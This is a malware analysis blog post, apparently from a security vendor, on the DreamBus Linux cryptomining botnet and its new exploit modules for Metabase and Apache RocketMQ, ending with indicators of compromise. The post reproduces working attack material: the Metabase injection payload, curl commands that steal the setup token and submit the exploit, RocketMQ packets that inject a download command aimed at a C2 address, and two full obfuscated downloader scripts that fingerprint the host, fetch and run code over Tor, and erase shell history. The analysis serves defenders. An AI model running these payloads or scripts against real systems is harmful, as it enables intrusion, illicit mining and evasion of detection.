Zscaler’s ThreatLabz research team has been tracking the Linux-based malware family known as DreamBus. Not much has changed in the last few years other than minor bug fixes, and slight modifications to evade detection from security software. However, in the last 6 months, the threat actor operating DreamBus has introduced two new modules to target vulnerabilities in Metabase and Apache RocketMQ. This is likely in response to a decrease in new infections stemming from exploits utilized by DreamBus, many of which are dated and have been in use for several years. DreamBus also continues to use techniques that exploit implicit trust and weak passwords including Secure Shell (SSH), IT administration tools, cloud-based applications, and databases. The primary monetization vector for DreamBus infections is still through mining Monero cryptocurrency.

Key Takeaways

DreamBus is a modular Linux-based botnet dating back to early 2019 with worm-like behavior that can spread across the internet as well as internal networks.
DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools.
Infected systems are monetized by mining Monero cryptocurrency using XMRig.
In June 2023, the DreamBus malware author introduced new changes to the code to further evade detection.
The threat actor developed two new exploit modules that target vulnerabilities in Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246).

Technical Analysis

Zscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e).

DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.

Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:

Metabase (CVE-2023-38646)
RocketMQ (CVE-2023-33246)
HashiCorp Consul
Hadoop YARN
Redis
PostgreSQL
SSH

The most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.

In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.

Metabase Exploit Module (CVE-2023-38646)

Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.

The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:

GET /api/session/properties HTTP/1.1
Host: 127.0.0.1:3000

The DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).

{
  "token": "setup-token",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "db": 
"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
      "advanced-options": false,
      "ssl": true,
      "init": "CREATE TRIGGER metabasex BEFORE SELECT ON 
INFORMATION_SCHEMA.TABLES AS 
$$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c 
{echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1
bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW
hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp
IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3
RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')\n$$"
     },
    "name": "meta-base-sex",
    "engine": "h2"
  }
}

DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:

setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo 
"([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum
:]]{12})"|tail -n 1);

After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.

sed -i \"s/setup-token/$setup_token/g\" /tmp/.json%s;

Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:

curl -X POST -4fs -H \"Content-Type: application/json\" -d 
@/tmp/.json%s %s:%d/api/setup/validate  &>/dev/null;rm -f /tmp/.json%s

If the exploit is successful, the following bash script will download and execute the DreamBus main module:

exec &>/dev/null
LHjFgxtn=./.$(date|md5sum|head -c20)
uPXAiDgp=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com 
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
AcCQYgCy="/tmp/systemd-private-de2381ccba8aa44b77bda1c971a33b5e-system
d-logind.service-vkHzrg"
VdHfWQsU="curl -m60 -fsSLkA- --doh-url 
https://${uPXAiDgp[$((RANDOM%${#uPXAiDgp[@]}))]}/dns-query"
JtkrXMaj="curl -m60 -fsSLkA-"
MTWuGlJu="relay.tor2socks.in"
PcSKnocJ="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$AcCQYgCy:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH

jJcSNhfn() {
     read proto server path <<<$(echo ${1//// })
     DOC=/${path// //}
     HOST=${server//:*}
     PORT=${server//*:}
     [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
     exec 3<>/dev/tcp/${HOST}/$PORT
     echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: 
${HOST}\r\n\r\n" >&3
     (while read line; do
     [[ "$line" == $'\r' ]] && break
     done && cat) <&3
     exec 3>&-
}

wtJymANw() {
     for i in $AcCQYgCy . /usr/bin /var/tmp /tmp ;do echo exit > $i/i 
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

OUneYJaz() {
     beKjoWyW=/exec
     yXCmWOnw=mb0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname 
-n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo 
no-id)|md5sum|awk NF=1)
     $VdHfWQsU -x socks5h://$MTWuGlJu:9050 -e$yXCmWOnw 
$PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $VdHfWQsU -e$yXCmWOnw 
$1$beKjoWyW -o$LHjFgxtn || $JtkrXMaj -x socks5h://$MTWuGlJu:9050 
-e$yXCmWOnw $PcSKnocJ.onion$beKjoWyW -o$LHjFgxtn || $JtkrXMaj 
-e$yXCmWOnw $1$beKjoWyW -o$LHjFgxtn
}

ZVdmcgjf() {
     chmod +x $LHjFgxtn;$LHjFgxtn;rm -f $LHjFgxtn
}

RAKjFxFv() {
     u=$PcSKnocJ.tor2web.re/load/
     cd /tmp && curl -V || (jJcSNhfn http://$u/cu) | tar zxp
     wtJymANw
     OUneYJaz $PcSKnocJ.tor2web.re ||
     OUneYJaz $PcSKnocJ.tor2web.in ||
     OUneYJaz $PcSKnocJ.tor2web.it
     ZVdmcgjf
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || RAKjFxFv
rm -f /home/user/.bash_history

Apache RocketMQ Exploit Module (CVE-2023-33246)

Apache RocketMQ is an open source distributed messaging and streaming platform that was originally created by Alibaba in 2012. In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.

The DreamBus RocketMQ exploit module scans for vulnerable servers on port 10911 by sending the following request to a target server:

00000000   00 00 00 c8 00 00 00 60  7b 22 63 6f 64 65 22 3a  |.......`{"code":|
00000010   32 35 2c 22 66 6c 61 67  22 3a 30 2c 22 6c 61 6e  |25,"flag":0,"lan|
00000020   67 75 61 67 65 22 3a 22  4a 41 56 41 22 2c 22 6f  |guage":"JAVA","o|
00000030   70 61 71 75 65 22 3a 30  2c 22 73 65 72 69 61 6c  |paque":0,"serial|
00000040   69 7a 65 54 79 70 65 43  75 72 72 65 6e 74 52 50  |izeTypeCurrentRP|
00000050   43 22 3a 22 4a 53 4f 4e  22 2c 22 76 65 72 73 69  |C":"JSON","versi|
00000060   6f 6e 22 3a 33 39 35 7d  66 69 6c 74 65 72 53 65  |on":395}filterSe|
00000070   72 76 65 72 4e 75 6d 73  3d 31 0a 72 6f 63 6b 65  |rverNums=1.rocke|
00000080   74 6d 71 48 6f 6d 65 3d  2d 63 20 24 40 7c 73 68  |tmqHome=-c $@|sh|
00000090   20 2e 20 65 63 68 6f 20  63 75 72 6c 20 2d 66 73  | . echo curl -fs|
000000a0   53 6b 4c 41 2d 20 39 32  2e 32 30 34 2e 32 34 33  |SkLA- 92.204.243|
000000b0   2e 31 35 35 3a 38 30 38  30 2f 72 6f 6b 65 74 20  |.155:8080/roket |
000000c0   2d 6f 20 72 65 6b 65 74  65 64 3b 0a              |-o reketed;.|

The first 4 bytes of the packet is the full message size (big endian), followed by 4 bytes for the size of the command (also big endian) within the curly braces. The code value 25 is used to call an update configuration function that is invoked without properly validating whether the client has the necessary permissions. As a result, an unauthenticated attacker can update the broker configuration file and most importantly the rocketmqHome variable to execute arbitrary commands. In this instance, the DreamBus module is setting the rocketmqHome variable in the configuration to the value:

-c $@|sh . echo curl -fsSkLA- 92.204.243.155:8080/roket -o reketed;

If the RocketMQ server is vulnerable, this shell command will use curl to download a malicious bash script and write it to a file named reketed. Example content of this script is shown below:

z3glwn;rm -f reketed
exec &>/dev/null
BDrFYzWg=./.$(date|md5sum|head -c20)
qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com 
doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-system
d-logind.service-z3glwn"
GRPoNTxD="curl -m60 -fsSLkA- --doh-url 
https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
ZwJtGQaC="curl -m60 -fsSLkA-"
HNPDsmwz="relay.tor2socks.in"
HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin
:/usr/local/sbin:$PATH

eGiAsomX() {
     read proto server path <<<$(echo ${1//// })
     DOC=/${path// //}
     HOST=${server//:*}
     PORT=${server//*:}
     [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
     exec 3<>/dev/tcp/${HOST}/$PORT
     echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: 
${HOST}\r\n\r\n" >&3
     (while read line; do
     [[ "$line" == $'\r' ]] && break
     done && cat) <&3
     exec 3>&-
}

bCQYhArV() {
     for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i 
&& chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

XNSBjYOO() {
     HoVCQHFu=/exec
     LouMQEck=rq1_$(curl -s4 ident.me||curl -4 
ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip 
r||hostname -i||echo no-id)|md5sum|awk NF=1)
     $GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck 
$HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck 
$1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 
-e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC 
-e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}

MPQKanDg() {
     chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}

dtOFCAtT() {
     u=$HyMbvhNq.tor2web.it/load/
     cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
     bCQYhArV
     XNSBjYOO $HyMbvhNq.tor2web.it ||
     XNSBjYOO $HyMbvhNq.tor2web.in ||
     XNSBjYOO $HyMbvhNq.tor2web.re
     MPQKanDg
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT

The DreamBus RocketMQ exploit module checks for the string opaque in the response to determine whether the exploit was successful. If the exploitation attempt was successful, the module then sends the following request to the RocketMQ server to execute the bash script:

00000000   00 00 00 a2 00 00 00 60  7b 22 63 6f 64 65 22 3a  |.......`{"code":|
00000010   32 35 2c 22 66 6c 61 67  22 3a 30 2c 22 6c 61 6e  |25,"flag":0,"lan|
00000020   67 75 61 67 65 22 3a 22  4a 41 56 41 22 2c 22 6f  |guage":"JAVA","o|
00000030   70 61 71 75 65 22 3a 30  2c 22 73 65 72 69 61 6c  |paque":0,"serial|
00000040   69 7a 65 54 79 70 65 43  75 72 72 65 6e 74 52 50  |izeTypeCurrentRP|
00000050   43 22 3a 22 4a 53 4f 4e  22 2c 22 76 65 72 73 69  |C":"JSON","versi|
00000060   6f 6e 22 3a 33 39 35 7d  66 69 6c 74 65 72 53 65  |on":395}filterSe|
00000070   72 76 65 72 4e 75 6d 73  3d 31 0a 72 6f 63 6b 65  |rverNums=1.rocke|
00000080   74 6d 71 48 6f 6d 65 3d  2d 63 20 24 40 7c 73 68  |tmqHome=-c $@|sh|
00000090   20 2e 20 65 63 68 6f 20  62 61 73 68 20 72 65 6b  | . echo bash rek|
000000a0   65 74 65 64 3b 0a                                 |eted;.|

The bash script will then download and execute the main DreamBus module.

Conclusion

DreamBus continues to pose a threat to organizations with brute force attacks against PostgreSQL, SSH, and Redis along with new exploits that target recent vulnerabilities in popular business applications. Zscaler ThreatLabz recommends that organizations properly secure all applications that are both publicly and privately accessible. Strong passwords and multi-factor authentication (MFA) should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify potential compromises.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below:

Indicators of Compromise (IOCs)

The following IOCs can be used to detect a DreamBus infection.

Samples

SHA256 Hash	Module Name
cd647d4497661bf0a7f9a11fd5ca84d52 f49d4cca74941a31cf631c8f6bc88d2	DreamBus PostgreSQL module
5d1721d4d362ddcdbd0762eccdb4e07b0 cc1c26c7d69da30e024e70c7063c519	DreamBus Redis module
9f49375ae05c16d80e02c21f178429602 f726ce87295b9dfd9458f37956392e3	DreamBus Metabase module
25d7b17521629f0861113b1e9f7653dc1 9c40b1d8f3de685ba29108a0d9fa7aa	DreamBus Hadoop Yarn module
34603862c5086a9063e42d79fb094e8d8 9e3aeef6f8eadf23c6925c6a4201a9c	DreamBus Hashicorp Consul module
b86fa919ab9ebaa3f8ead4f7ef6ee0bb9 4a3a1b7d9583e99598893f2738a1c71	DreamBus RocketMQ module
e52b70a76e382ffd2aff02d1d26269036 c589676ba1f2086051c11cb7997a5a5	DreamBus SSH module
5a55acdae38219411b2f3350db425d888 3d6238e465d07a71cadfe89877df6ac	DreamBus XMRig miner

Network indicators

Domain/IP Address	Description
ru6r4inkaf4thlgflg4iqs5mhqwqubols 5qagspvya4whp3dgbvmyhad[.]onion	DreamBus C2 domain
139.59.150[.]7	DreamBus C2 IP address
92.204.243[.]155	DreamBus C2 IP address
p2pool[.]it	DreamBus Monero mining pool